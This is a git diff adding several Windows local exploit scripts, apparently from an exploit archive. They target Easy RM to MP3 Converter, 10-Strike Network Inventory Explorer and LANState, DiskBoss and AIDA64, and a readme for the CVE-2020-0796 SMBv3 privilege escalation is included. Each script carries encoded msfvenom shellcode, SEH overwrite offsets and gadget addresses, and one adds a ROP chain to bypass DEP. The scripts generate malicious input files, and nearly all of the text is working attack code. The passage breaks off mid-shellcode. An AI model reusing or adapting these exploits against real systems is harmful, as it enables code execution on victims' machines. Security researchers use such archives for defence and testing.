+buf += b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
+buf += b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+buf += b"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x6b\x58\x4d\x52"
+buf += b"\x55\x50\x73\x30\x67\x70\x55\x30\x6c\x49\x4a\x45\x65"
+buf += b"\x61\x69\x50\x62\x44\x6c\x4b\x76\x30\x46\x50\x4e\x6b"
+buf += b"\x76\x32\x46\x6c\x6c\x4b\x52\x72\x65\x44\x6e\x6b\x72"
+buf += b"\x52\x74\x68\x44\x4f\x4f\x47\x73\x7a\x64\x66\x65\x61"
+buf += b"\x49\x6f\x4e\x4c\x47\x4c\x50\x61\x71\x6c\x34\x42\x66"
+buf += b"\x4c\x71\x30\x6b\x71\x58\x4f\x44\x4d\x46\x61\x68\x47"
+buf += b"\x4a\x42\x6c\x32\x51\x42\x63\x67\x4c\x4b\x76\x32\x72"
+buf += b"\x30\x4e\x6b\x33\x7a\x35\x6c\x4c\x4b\x50\x4c\x32\x31"
+buf += b"\x31\x68\x59\x73\x53\x78\x55\x51\x6b\x61\x70\x51\x4e"
+buf += b"\x6b\x70\x59\x47\x50\x35\x51\x68\x53\x6e\x6b\x51\x59"
+buf += b"\x37\x68\x6a\x43\x45\x6a\x62\x69\x6c\x4b\x54\x74\x6c"
+buf += b"\x4b\x55\x51\x4a\x76\x76\x51\x39\x6f\x6c\x6c\x6b\x71"
+buf += b"\x4a\x6f\x36\x6d\x77\x71\x6a\x67\x77\x48\x69\x70\x33"
+buf += b"\x45\x7a\x56\x64\x43\x61\x6d\x68\x78\x45\x6b\x53\x4d"
+buf += b"\x66\x44\x53\x45\x69\x74\x70\x58\x4e\x6b\x76\x38\x74"
+buf += b"\x64\x77\x71\x38\x53\x52\x46\x6e\x6b\x34\x4c\x72\x6b"
+buf += b"\x6e\x6b\x56\x38\x45\x4c\x57\x71\x38\x53\x6c\x4b\x75"
+buf += b"\x54\x6e\x6b\x76\x61\x4a\x70\x4e\x69\x67\x34\x44\x64"
+buf += b"\x31\x34\x51\x4b\x73\x6b\x43\x51\x30\x59\x51\x4a\x53"
+buf += b"\x61\x59\x6f\x49\x70\x31\x4f\x33\x6f\x63\x6a\x6c\x4b"
+buf += b"\x57\x62\x68\x6b\x6c\x4d\x73\x6d\x42\x4a\x33\x31\x4c"
+buf += b"\x4d\x4f\x75\x4e\x52\x73\x30\x35\x50\x47\x70\x66\x30"
+buf += b"\x51\x78\x35\x61\x4e\x6b\x42\x4f\x6f\x77\x59\x6f\x58"
+buf += b"\x55\x4f\x4b\x4d\x30\x35\x4d\x75\x7a\x65\x5a\x63\x58"
+buf += b"\x49\x36\x4f\x65\x6d\x6d\x6d\x4d\x79\x6f\x79\x45\x45"
+buf += b"\x6c\x77\x76\x33\x4c\x57\x7a\x4f\x70\x6b\x4b\x69\x70"
+buf += b"\x74\x35\x57\x75\x6d\x6b\x33\x77\x65\x43\x43\x42\x62"
+buf += b"\x4f\x32\x4a\x37\x70\x53\x63\x79\x6f\x6a\x75\x33\x53"
+buf += b"\x35\x31\x72\x4c\x61\x73\x54\x6e\x61\x75\x61\x68\x75"
+buf += b"\x35\x57\x70\x41\x41"
+
+nseh = struct.pack("<I", 0x06710870)
+seh = struct.pack("<I", 0x10025A2E) # 0x10025a2e : pop ecx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [MSRMfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Easy RM to MP3 Converter\MSRMfilter03.dll)
+
+buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 5 + buf + "\xff" * 200
+
+try:
+    f = open ("poc.txt", "w")
+    f.write(buffer)
+    f.close()
+    print "[+] The file has been created successfully!"
+
+except:
+    print "[!] There has been an error while creating the file."
\ No newline at end of file
diff --git a/exploits/windows/local/48264.py b/exploits/windows/local/48264.py
new file mode 100755
index 000000000..e6ad38b43
--- /dev/null
+++ b/exploits/windows/local/48264.py
@@ -0,0 +1,141 @@
+# Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)
+# Date: 2020-03-30
+# Exploit Author:   Hodorsec
+# Version: 9.03
+# Software Link:    https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
+# Vendor Homepage:  https://www.10-strike.com
+# Tested on:        Win8.1 x64 - Build 9600
+
+# Description:      
+# - Exploits the functionality to load a list of computers from a file
+# - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP
+# - Used a jump after ROP to go to a buffer for more space
+
+# Reproduction:
+# - Run the script, a TXT file will be generated
+# - Open the program and click on tab "Computers"
+# - Click the button "From Text File" and select the generated TXT file
+# - Clck OK and check results
+
+# WinDBG initial crash output:
+# (f54.f48): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe
+# eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000
+# eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0         nv up ei pl nz na po cy
+# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210203
+# NetworkInventoryExplorer+0x2b47:
+# 00402b47 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
+# 0:000> g
+# (f54.f48): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388
+# eip=41414141 esp=0018f8dc ebp=41414141 iopl=0         nv up ei pl nz na po nc
+# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
+# 41414141 ??              ???
+
+
+#!/usr/bin/python
+
+import sys, struct
+
+filename = "poc_10_strike_nie.txt"
+
+# Maximum length
+maxlen = 5000
+
+# Offsets
+crash_esi = 2145                                                # Initial space until ESI buffer filling
+crash_seh = 217                                                 # SEH
+crash_nseh = crash_seh - 4                                      # NSEH
+landingpad = 310                                                # Space for RET NOP landingpad after stackpivoting
+
+# Shellcode
+# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b "\x0a\x0d\x00\x5c\x3a" exitfunc=thread
+# Payload size: 220 bytes
+shellcode =  b""
+shellcode += b"\xda\xdb\xd9\x74\x24\xf4\x5f\x2b\xc9\xbd\x06"
+shellcode += b"\xa7\x5d\x4b\xb1\x31\x83\xef\xfc\x31\x6f\x14"
+shellcode += b"\x03\x6f\x12\x45\xa8\xb7\xf2\x0b\x53\x48\x02"
+shellcode += b"\x6c\xdd\xad\x33\xac\xb9\xa6\x63\x1c\xc9\xeb"
+shellcode += b"\x8f\xd7\x9f\x1f\x04\x95\x37\x2f\xad\x10\x6e"
+shellcode += b"\x1e\x2e\x08\x52\x01\xac\x53\x87\xe1\x8d\x9b"
+shellcode += b"\xda\xe0\xca\xc6\x17\xb0\x83\x8d\x8a\x25\xa0"
+shellcode += b"\xd8\x16\xcd\xfa\xcd\x1e\x32\x4a\xef\x0f\xe5"
+shellcode += b"\xc1\xb6\x8f\x07\x06\xc3\x99\x1f\x4b\xee\x50"
+shellcode += b"\xab\xbf\x84\x62\x7d\x8e\x65\xc8\x40\x3f\x94"
+shellcode += b"\x10\x84\x87\x47\x67\xfc\xf4\xfa\x70\x3b\x87"
+shellcode += b"\x20\xf4\xd8\x2f\xa2\xae\x04\xce\x67\x28\xce"
+shellcode += b"\xdc\xcc\x3e\x88\xc0\xd3\x93\xa2\xfc\x58\x12"
+shellcode += b"\x65\x75\x1a\x31\xa1\xde\xf8\x58\xf0\xba\xaf"
+shellcode += b"\x65\xe2\x65\x0f\xc0\x68\x8b\x44\x79\x33\xc1"
+shellcode += b"\x9b\x0f\x49\xa7\x9c\x0f\x52\x97\xf4\x3e\xd9"
+shellcode += b"\x78\x82\xbe\x08\x3d\x6c\x5d\x99\x4b\x05\xf8"
+shellcode += b"\x48\xf6\x48\xfb\xa6\x34\x75\x78\x43\xc4\x82"
+shellcode += b"\x60\x26\xc1\xcf\x26\xda\xbb\x40\xc3\xdc\x68"
+shellcode += b"\x60\xc6\xbe\xef\xf2\x8a\x6e\x8a\x72\x28\x6f"
+
+# ROP chain
+def create_rop_chain():
+    # rop chain generated with mona.py - www.corelan.be
+    rop_gadgets = [
+      0x7c344efe,  # POP EDX # RETN [MSVCR71.dll] 
+      0x61e9b30c,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
+      0x010283e5,  # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe] 
+      0x010296a1,  # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe] 
+      0x61e7555f,  # POP EBP # RETN [sqlite3.dll] 
+      0x61e63eaf,  # & push esp # ret 0x04 [sqlite3.dll]
+      0x7c37678f,  # POP EAX # RETN [MSVCR71.dll] 
+      0xfffffdff,  # Value to negate, will become 0x00000201
+      0x7c34d749,  # NEG EAX # RETN [MSVCR71.dll] 
+      0x0102a8a0,  # POP EBX # RETN [NetworkInventoryExplorer.exe] 
+      0xffffffff,  #  
+      0x61e0579d,  # INC EBX # RETN [sqlite3.dll] 
+      0x0102104a,  # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe] 
+      0x7c3458e6,  # POP EDX # RETN [MSVCR71.dll] 
+      0xffffffc0,  # Value to negate, will become 0x00000040
+      0x7c351eb1,  # NEG EDX # RETN [MSVCR71.dll] 
+      0x7c369c4a,  # POP ECX # RETN [MSVCR71.dll] 
+      0x7c38dfd7,  # &Writable location [MSVCR71.dll]
+      0x7c34a40e,  # POP EDI # RETN [MSVCR71.dll] 
+      0x0101da30,  # RETN (ROP NOP) [NetworkInventoryExplorer.exe]
+      0x01014218,  # POP EAX # RETN [NetworkInventoryExplorer.exe] 
+      0x90909090,  # nop
+      0x01014244,  # PUSHAD # RETN [NetworkInventoryExplorer.exe] 
+    ]
+    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
+rop_chain = create_rop_chain()
+
+# NOPPING
+retnop = struct.pack("<L", 0x61e0103e)                          # RET # sqlite3.dll
+prenop = "\x90" * 200                                           # Pre NOP's after jumping back in stack, sledding until shellcode
+postnop = "\x90" * 16                                           # Post NOP's after running ROP chain to disable DEP
+
+# Jump back on stack for payload space
+jmpback = "\xe9\x9f\xf9\xff\xff"                                # jmp 0xfffff9a4 # Jump back on stack for more space
+
+# Prefix
+prefix = "A" * crash_nseh                                       # Junk until NSEH
+nseh = "B" * 4                                                  # Junk again, no use for NSEH
+seh = struct.pack("<L", 0x0101ce0b)                             # ADD ESP,0BDC # RETN 0x0C    ** [NetworkInventoryExplorer.exe] ** # Stackpivot
+suffix = prenop                                                 # Prenopping until shellcode
+suffix += shellcode                                             # Magic!
+suffix += retnop * landingpad                                   # RET NOP as a landingpad after stackpivot, still having DEP enabled
+suffix += rop_chain                                             # Disable DEP
+suffix += postnop                                               # Old school NOP-sledding
+suffix += jmpback                                               # Jump! Just like van Halen
+suffix += "C" * (maxlen - len(prefix + nseh + seh + suffix))    # Junk for filling
+
+# Concatenate string for payload
+payload = prefix + nseh + seh + suffix                          # Put it all together
+
+try:
+    file = open(filename,"wb")
+    file.write(payload)
+    file.close()
+    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
+except:
+    print "[!] Error creating file!"
+    sys.exit(0)
\ No newline at end of file
diff --git a/exploits/windows/local/48267.txt b/exploits/windows/local/48267.txt
new file mode 100644
index 000000000..d61aaa519
--- /dev/null
+++ b/exploits/windows/local/48267.txt
@@ -0,0 +1,22 @@
+# CVE-2020-0796
+
+Windows SMBv3 LPE Exploit
+
+![exploit](https://user-images.githubusercontent.com/1675387/77913732-110d4f80-7295-11ea-9af6-f17201c66673.gif)
+
+## Authors
+
+  * Daniel García Gutiérrez ([@danigargu](https://twitter.com/danigargu))
+  * Manuel Blanco Parajón ([@dialluvioso_](https://twitter.com/dialluvioso_))
+
+## References
+
+* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
+* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html
+* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter
+* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/
+* http://blogs.360.cn/post/CVE-2020-0796.html
+* https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/
+
+
+Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip
\ No newline at end of file
diff --git a/exploits/windows/local/48277.py b/exploits/windows/local/48277.py
new file mode 100755
index 000000000..b08dc4c70
--- /dev/null
+++ b/exploits/windows/local/48277.py
@@ -0,0 +1,124 @@
+# Exploit Title: 10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)
+# Date: 2020-04-01
+# Exploit Author: Hodorsec
+# Version: v9.32 x86
+# Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe
+# Vendor Homepage:  https://www.freecommander.com
+# Tested on:        Win7 x86 SP1 - Build 7601
+
+# Description:      
+# - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string, results in a crash which overwrites SEH.
+
+# Reproduction:
+# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
+# - Run the script, a TXT file will be generated
+# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
+# - Open LANState, use any "Map", for example the "demo_map"
+# - Click on tab "Home", click option "Check List"
+# - Rightclick on any existing hostname and click "Edit"
+# - Paste the value from clipboard in the field "Host address (name)"
+# - Next, Next, Finish
+# - In the "List of checks" overview, select the modified host and press the spacebar (Force Check)
+# - Check results
+
+# WinDBG initial crash output using only A's:
+# (c5c.c2c): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
+# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0         nv up ei pl nz na po nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
+# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe
+# LANState+0x2e57:
+# 00402e57 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
+# 0:000> g
+# (c5c.c2c): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
+# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0         nv up ei pl nz na pe nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
+# LANState+0x53e6:
+# 004053e6 8b4af8          mov     ecx,dword ptr [edx-8] ds:0023:41414139=????????
+# 0:000> g
+# (c5c.c2c): Access violation - code c0000005 (first chance)
+# First chance exceptions are reported before any exception handling.
+# This exception may be expected and handled.
+# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
+# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0         nv up ei pl zr na pe nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
+# 41414141 ??              ???
+
+#!/usr/bin/python
+
+import sys,struct
+
+# Filename
+filename = "10_strike_lanstate-poc.txt"
+
+# Maximum length
+maxlen = 10000
+
+# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
+# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode
+# Payload size: 447 bytes
+shellcode = (
+"\xdb\xdc\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
+"\x4c\x78\x68\x6d\x52\x65\x50\x37\x70\x77\x70\x43\x50\x4d\x59"
+"\x39\x75\x36\x51\x59\x50\x32\x44\x6e\x6b\x32\x70\x46\x50\x6e"
+"\x6b\x70\x52\x34\x4c\x6e\x6b\x61\x42\x45\x44\x4c\x4b\x54\x32"
+"\x47\x58\x36\x6f\x6e\x57\x53\x7a\x66\x46\x46\x51\x79\x6f\x4e"
+"\x4c\x37\x4c\x51\x71\x53\x4c\x44\x42\x44\x6c\x61\x30\x4a\x61"
+"\x68\x4f\x66\x6d\x73\x31\x49\x57\x59\x72\x58\x72\x30\x52\x56"
+"\x37\x4e\x6b\x52\x72\x34\x50\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b"
+"\x42\x6c\x57\x61\x74\x38\x6d\x33\x33\x78\x77\x71\x4b\x61\x32"
+"\x71\x6e\x6b\x51\x49\x77\x50\x76\x61\x6a\x73\x6e\x6b\x61\x59"
+"\x67\x68\x79\x73\x57\x4a\x42\x69\x4e\x6b\x37\x44\x6c\x4b\x43"
+"\x31\x4e\x36\x45\x61\x6b\x4f\x6c\x6c\x6a\x61\x48\x4f\x34\x4d"
+"\x47\x71\x5a\x67\x37\x48\x39\x70\x62\x55\x4b\x46\x65\x53\x63"
+"\x4d\x39\x68\x67\x4b\x73\x4d\x46\x44\x53\x45\x79\x74\x76\x38"
+"\x4c\x4b\x63\x68\x66\x44\x43\x31\x48\x53\x72\x46\x4e\x6b\x76"
+"\x6c\x70\x4b\x4e\x6b\x61\x48\x57\x6c\x46\x61\x79\x43\x6c\x4b"
+"\x54\x44\x6e\x6b\x57\x71\x68\x50\x6e\x69\x30\x44\x76\x44\x45"
+"\x74\x53\x6b\x61\x4b\x65\x31\x62\x79\x31\x4a\x30\x51\x39\x6f"
+"\x59\x70\x63\x6f\x71\x4f\x50\x5a\x6c\x4b\x56\x72\x4a\x4b\x6c"
+"\x4d\x73\x6d\x30\x6a\x77\x71\x6e\x6d\x4d\x55\x4e\x52\x37\x70"
+"\x75\x50\x63\x30\x52\x70\x63\x58\x56\x51\x4e\x6b\x42\x4f\x4e"
+"\x67\x69\x6f\x49\x45\x4d\x6b\x58\x70\x4d\x65\x6d\x72\x50\x56"
+"\x75\x38\x6e\x46\x6f\x65\x6f\x4d\x6d\x4d\x39\x6f\x58\x55\x75"
+"\x6c\x63\x36\x73\x4c\x76\x6a\x6b\x30\x59\x6b\x4d\x30\x52\x55"
+"\x74\x45\x6f\x4b\x43\x77\x42\x33\x63\x42\x62\x4f\x51\x7a\x77"
+"\x70\x73\x63\x69\x6f\x58\x55\x72\x43\x30\x61\x72\x4c\x31\x73"
+"\x46\x4e\x45\x35\x63\x48\x63\x55\x47\x70\x41\x41"
+)
+
+# Offsets
+crash_ebp = 228
+crash_nseh = 236
+crash_seh = crash_nseh + 4
+
+# Variables
+nops = "\x90" * 16                                              # Nops
+
+# Prefix
+prefix = "A" * crash_nseh                                       # Filler
+nseh = "\x71\x06\x70\x04"                                       # JNO # JO # Jump over NSEH/SEH
+seh = struct.pack("<L", 0x0132730f)                             # call dword ptr ss:[ebp-04] # [LANState.exe]
+suffix = nops                                                   # Old-school NOP'ing
+suffix += shellcode                                             # Magic!
+suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))    # Filler
+
+# Concatenate string for payload
+payload = prefix + nseh + seh + suffix                          # Put it all together
+
+try:
+    file = open(filename,"wb")
+    file.write(payload)
+    file.close()
+    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
+except:
+    print "[!] Error creating file!"
+    sys.exit(0)
\ No newline at end of file
diff --git a/exploits/windows/local/48279.py b/exploits/windows/local/48279.py
new file mode 100755
index 000000000..0324b7b79
--- /dev/null
+++ b/exploits/windows/local/48279.py
@@ -0,0 +1,80 @@
+# Exploit Title: DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC) 
+# Vendor Homepage: https://www.diskboss.com/ 
+# Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
+# Exploit Author: Paras Bhatia
+# Discovery Date: 2020-04-01
+# Vulnerable Software: DiskBoss
+# Version: 7.7.14
+# Vulnerability Type: Local Buffer Overflow
+# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  
+
+#Steps to Produce the Crash:
+
+#   1.- Run python code: DiskbossLCE.py
+#   2.- Copy content to clipboard
+#   3.- Turn off DEP for diskbsg.exe
+#   4.- Open "diskboss.exe" (diskbsg.exe)
+#   5.- Go to "Command" > Search Files
+#   6.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares")
+#   7.- Click on " Add Input Directory"
+#   8.- Paste ClipBoard into the "Directory" field
+#   9.- Click on OK
+#   10.- Calc.exe runs
+
+#################################################################################################################################################
+
+#Python "DiskbossLCE.py" Code:
+   
+f = open("DiskbossLCE.txt", "w")
+
+# Message=  0x650EA4CA : jmp ebx |  [QtGui4.dll] (C:\Program Files\DiskBoss\bin\QtGui4.dll)
+
+jmpebx = "\xCA\xA4\x0E\x65"
+
+# msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed BufferRegister=EBX -f python -b "\x0a\x0d\x2f\x5c\x00"
+
+buf =  ""
+buf += "\x53\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x79\x6c\x79\x78\x4e\x62\x73\x30\x63\x30\x67\x70\x73"
+buf += "\x50\x4f\x79\x48\x65\x56\x51\x59\x50\x31\x74\x6c\x4b"
+buf += "\x30\x50\x50\x30\x4c\x4b\x51\x42\x74\x4c\x6e\x6b\x51"
+buf += "\x42\x74\x54\x4c\x4b\x44\x32\x77\x58\x44\x4f\x4c\x77"
+buf += "\x70\x4a\x55\x76\x44\x71\x69\x6f\x4c\x6c\x45\x6c\x53"
+buf += "\x51\x73\x4c\x55\x52\x74\x6c\x31\x30\x49\x51\x4a\x6f"
+buf += "\x34\x4d\x43\x31\x7a\x67\x69\x72\x6c\x32\x72\x72\x71"
+buf += "\x47\x6c\x4b\x42\x72\x54\x50\x6c\x4b\x70\x4a\x65\x6c"
+buf += "\x4c\x4b\x70\x4c\x64\x51\x62\x58\x39\x73\x51\x58\x67"
+buf += "\x71\x38\x51\x66\x31\x4c\x4b\x31\x49\x31\x30\x33\x31"
+buf += "\x78\x53\x4c\x4b\x31\x59\x44\x58\x49\x73\x65\x6a\x51"
+buf += "\x59\x6e\x6b\x30\x34\x4e\x6b\x73\x31\x58\x56\x56\x51"
+buf += "\x4b\x4f\x6c\x6c\x5a\x61\x5a\x6f\x34\x4d\x65\x51\x58"
+buf += "\x47\x35\x68\x4d\x30\x30\x75\x58\x76\x55\x53\x31\x6d"
+buf += "\x49\x68\x45\x6b\x43\x4d\x74\x64\x32\x55\x4b\x54\x42"
+buf += "\x78\x6c\x4b\x51\x48\x46\x44\x57\x71\x48\x53\x62\x46"
+buf += "\x4e\x6b\x46\x6c\x50\x4b\x4c\x4b\x73\x68\x75\x4c\x43"
+buf += "\x31\x79\x43\x4e\x6b\x36\x64\x6c\x4b\x45\x51\x6e\x30"
+buf += "\x4e\x69\x30\x44\x56\x44\x57\x54\x51\x4b\x61\x4b\x73"
+buf += "\x51\x51\x49\x50\x5a\x50\x51\x4b\x4f\x6b\x50\x33\x6f"
+buf += "\x33\x6f\x72\x7a\x6c\x4b\x42\x32\x78\x6b\x4e\x6d\x31"
+buf += "\x4d\x50\x6a\x56\x61\x6e\x6d\x4b\x35\x38\x32\x43\x30"
+buf += "\x47\x70\x35\x50\x42\x70\x62\x48\x36\x51\x4e\x6b\x32"
+buf += "\x4f\x6d\x57\x49\x6f\x4e\x35\x6f\x4b\x7a\x50\x4d\x65"
+buf += "\x6c\x62\x32\x76\x71\x78\x6c\x66\x6e\x75\x4f\x4d\x6f"
+buf += "\x6d\x4b\x4f\x5a\x75\x65\x6c\x46\x66\x33\x4c\x66\x6a"
+buf += "\x6b\x30\x4b\x4b\x4d\x30\x53\x45\x34\x45\x4f\x4b\x53"
+buf += "\x77\x64\x53\x64\x32\x30\x6f\x42\x4a\x43\x30\x50\x53"
+buf += "\x59\x6f\x78\x55\x75\x33\x51\x71\x72\x4c\x73\x53\x36"
+buf += "\x4e\x55\x35\x74\x38\x71\x75\x47\x70\x41\x41"
+
+junk1 = "A" * 4096
+junk2 = "C" * 1196
+
+
+payload= junk1 + jmpebx + junk2 + buf
+
+
+f.write(payload)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48281.py b/exploits/windows/local/48281.py
new file mode 100755
index 000000000..231d51780
--- /dev/null
+++ b/exploits/windows/local/48281.py
@@ -0,0 +1,120 @@
+# Exploit Title: AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)
+# Date: 2020-04-02
+# Exploit Author: Hodorsec
+# Version: v6.20.5300
+# Software Link: http://download.aida64.com/aida64engineer620.exe
+# Vendor Homepage: https://www.aida64.com/products/aida64-engineer
+# Tested on: Win7 x86 SP1 - Build 7601
+
+# Description:      
+# - Exploits the "Report File" buffer when sending an e-mail report via the Report wizard. Entering an overly long string, results in a crash which overwrites SEH.
+
+# Reproduction:
+# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
+# - Run the script, a TXT file will be generated
+# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
+# - Open AIDA64 Engineer
+# - First, click on "File", "Preferences"
+# - Click menu "Report", "Report File"
+# - Enter a long string in the field "File name"
+# - Set "File extension" to automatic, as by default
+# - Click OK
+# - Second, in the main menu, click "Report" which shows the "Report Wizard"
+# - Next, "System Summary only", next, "Plain Text", Finish
+# - Click the button "Send In E-mail"
+# - Check results
+
+# WinDBG initial crash output using only A's:
+# (994.998): Access violation - code c0000005 (!!! second chance !!!)
+# eax=03ac1048 ebx=03ac100c ecx=03ac109c edx=77f070f4 esi=03ac1140 edi=00000000
+# eip=77f133a8 esp=03ac0fc8 ebp=03ac1000 iopl=0         nv up ei pl nz ac po nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
+# ntdll!RtlAcquireSRWLockShared+0x1a:
+# 77f133a8 8365f400        and     dword ptr [ebp-0Ch],0 ss:0023:03ac0ff4=????????
+
+#!/usr/bin/python
+import sys,struct
+
+filename = "aida64_engineer_poc.txt"
+
+# Maximum length
+maxlen = 5000
+
+# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
+# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b '\x00\x0a\x0d' bufferregister=eax
+# Payload size: 440 bytes
+shellcode = (
+"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
+"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49\x78\x6d\x52\x33\x30"
+"\x45\x50\x45\x50\x53\x50\x6b\x39\x6d\x35\x36\x51\x49\x50\x43"
+"\x54\x6e\x6b\x52\x70\x54\x70\x6c\x4b\x51\x42\x66\x6c\x4c\x4b"
+"\x62\x72\x52\x34\x6e\x6b\x54\x32\x46\x48\x54\x4f\x6d\x67\x52"
+"\x6a\x57\x56\x36\x51\x6b\x4f\x4e\x4c\x47\x4c\x31\x71\x71\x6c"
+"\x53\x32\x36\x4c\x37\x50\x5a\x61\x6a\x6f\x54\x4d\x77\x71\x5a"
+"\x67\x7a\x42\x38\x72\x70\x52\x46\x37\x4e\x6b\x53\x62\x52\x30"
+"\x6c\x4b\x52\x6a\x47\x4c\x4c\x4b\x50\x4c\x67\x61\x51\x68\x78"
+"\x63\x43\x78\x56\x61\x4a\x71\x53\x61\x6c\x4b\x33\x69\x55\x70"
+"\x37\x71\x6a\x73\x4c\x4b\x43\x79\x72\x38\x49\x73\x46\x5a\x32"
+"\x69\x4c\x4b\x44\x74\x6e\x6b\x67\x71\x58\x56\x54\x71\x6b\x4f"
+"\x6e\x4c\x49\x51\x78\x4f\x44\x4d\x63\x31\x68\x47\x30\x38\x79"
+"\x70\x30\x75\x68\x76\x43\x33\x51\x6d\x69\x68\x75\x6b\x61\x6d"
+"\x74\x64\x44\x35\x78\x64\x52\x78\x6c\x4b\x73\x68\x74\x64\x57"
+"\x71\x68\x53\x31\x76\x4c\x4b\x46\x6c\x32\x6b\x6e\x6b\x76\x38"
+"\x47\x6c\x43\x31\x6b\x63\x6c\x4b\x33\x34\x6e\x6b\x46\x61\x38"
+"\x50\x4c\x49\x77\x34\x31\x34\x61\x34\x43\x6b\x71\x4b\x53\x51"
+"\x42\x79\x33\x6a\x62\x71\x6b\x4f\x4b\x50\x53\x6f\x61\x4f\x52"
